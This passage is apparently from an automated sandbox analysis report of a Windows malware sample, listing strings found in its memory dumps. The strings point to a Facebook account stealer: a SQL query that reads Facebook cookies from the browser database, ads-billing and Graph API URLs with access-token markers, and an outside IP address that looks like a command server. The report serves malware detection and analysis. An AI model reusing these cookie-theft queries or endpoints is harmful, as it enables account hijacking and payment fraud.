20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing/?act= equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/pages/?category=your_pages&ref=bookmarks equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.336031175.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.comSoftware\zsmjrry\zsmjrrySoftware\zsmjrry\zsmjrry1Software\zsmjrryhttp://103.136.42.153/seemorebty/z9Yzbx5JbVSUWmTGhttps://www.facebook.comwww.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36https://graph.facebook.com/&_index=5&_reqName=adaccount&_reqSrc=AdsPaymentMethodsDataLoader&_sessionID=&method=get&pretty=0&suppress_http_code=1/ads/manager/account_settings/account_billing/?act=&pid=p1&page=account_settings&tab=account_billing_settings/profile.php?sk=friends/ads/manager/accounts?_fb_noscript=1all_accounts_table_account_id_cellhref="/pages/?category=your_pages&ref=bookmarks/bookmarks/pages?ref_type=logout_geartab_count:/profile.php?id=adsApiVersion:"locale:"sessionId:"access_token:"?act=FDroid1Software\ffdroider equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.556175662.00000000009CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.comll equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408530805.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.409020260.0000000000A85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.comop\d equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.405305583.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.551121249.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408530805.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545939808.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406492322.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406780287.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475008071.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.409020260.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.467253250.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.446086302.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.472522947.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.405892826.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.382189372.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545570144.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.561660230.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.469104643.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_e equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.409104350.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.489042211.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292787742.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.546008164.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.446337152.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475645170.0000000000AA5000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.467586006.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488666125.0000000000AA5000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292928855.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.477008160.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.551408247.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292504672.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292562402.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292441887.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.562658889.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.530899340.0000000003E5F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.470954417.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.530758241.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.477617227.0000000003E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292787742.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414426921.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292928855.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.581580292.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.517348522.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.462454767.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.511073198.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.455639744.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.467720820.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.510209199.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.530954384.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.526750231.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.530675690.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.515757312.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: select name,value,encrypted_value from cookies where instr("www.facebook.com", host_key)>0 equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414426921.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: select name,value,encrypted_value from cookies where instr("www.facebook.com", host_key)>0l9\|Z equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.581580292.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: select name,value,encrypted_value from cookies where instr("www.facebook.com", host_key)>0qc equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: select name,value,encrypted_value from cookies where instr("www.facebook.com", host_key)>0q} equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414234687.00000000033E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.c)P equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408808757.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.580355166.00000000033E5000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292787742.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.405305583.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.551121249.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408530805.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414426921.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545939808.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292609395.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.487732693.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.474969997.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414234687.00000000033E4000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.559956447.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406492322.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406780287.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.559498712.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.468244036.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292928855.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475008071.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.409020260.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.291001931.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.467253250.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.291106993.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292504672.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292769385.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.446086302.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414395526.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292562402.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.472522947.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.489247468.00000000033E4000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.405892826.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414757567.0000000000A51000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.382189372.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545543130.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545570144.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292441887.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.561660230.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.465481318.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.469104643.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488145414.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.526088410.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.443681922.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.385857761.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.383360821.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.384657603.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.384985327.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.320018633.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.550122757.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.385581692.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.384106680.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.527786558.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.390724591.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.383649935.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.579806691.0000000002F0D000.00000004.00000010.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.580259278.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.396368978.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.385396234.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.437973389.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.579550276.000000000383D000.00000004.00000010.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.569854907.0000000000F00000.00000004.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.336031175.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.559498712.0000000000A37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com! equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292769385.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com"( equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414757567.0000000000A51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com"pz equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.429617490.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.443681922.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.437973389.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com& equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.551121249.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545939808.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475008071.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545570144.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.561660230.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com.1537 equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408530805.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.409020260.0000000000A85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com.1537u equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.551121249.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545939808.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475008071.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545570144.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.561660230.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.426111480.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.385857761.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.383360821.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.384657603.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.384985327.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.385581692.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.384106680.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.390724591.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.383649935.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.423711730.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.396368978.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.385396234.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com3a`P! equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.551121249.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545939808.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475008071.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545570144.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.561660230.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com4 equals www.facebook.com (Facebook)
